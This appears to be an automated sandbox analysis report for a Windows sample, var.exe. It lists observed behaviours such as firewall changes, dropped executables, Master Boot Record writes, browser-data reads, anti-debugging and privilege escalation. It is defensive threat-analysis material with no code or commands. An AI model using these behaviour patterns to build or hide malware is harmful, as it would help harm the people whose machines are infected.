Analysis Overview
SHA256
a12cb2d529a95798160114bdb6fb389553d3cc1d8bd10a5c8295d5a0c74e257c
Threat Level: Likely malicious
The file var.exe was found to be: Likely malicious.
Malicious Activity Summary
Creates new service(s)
Modifies Windows Firewall
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Writes to the Master Boot Record (MBR)
Enumerates connected drives
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Unsigned PE
Uses Task Scheduler COM API
Checks processor information in registry
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Checks SCSI registry key(s)
Uses Volume Shadow Copy service COM API
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-14 17:41
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-14 17:41
Reported
2024-06-14 17:44
Platform
win7-20240508-en
Max time kernel
146s
Max time network
149s
Command Line
Signatures
Creates new service(s)
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\R: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\P: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\V: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\S: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\W: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\I: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\M: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\T: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\WeGame\WeGame.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174409-362.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\1 | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\beacon_sdk.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\common.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\adapt_for_imports.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\Lua51.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174239-194.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174309-208.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WeGame\log\wegame.mem.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Program Files (x86)\WeGame\log\wegame.20240614-174339-316.log | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSI394D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI398D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev3 | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\Installer\f763553.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f763556.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI37D3.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3833.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f763553.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev1 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI35D0.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI37E4.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f763556.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host | C:\Windows\system32\cscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\cscript.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80bb632a82beda01 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | C:\Windows\system32\cscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft | C:\Windows\system32\cscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\cscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
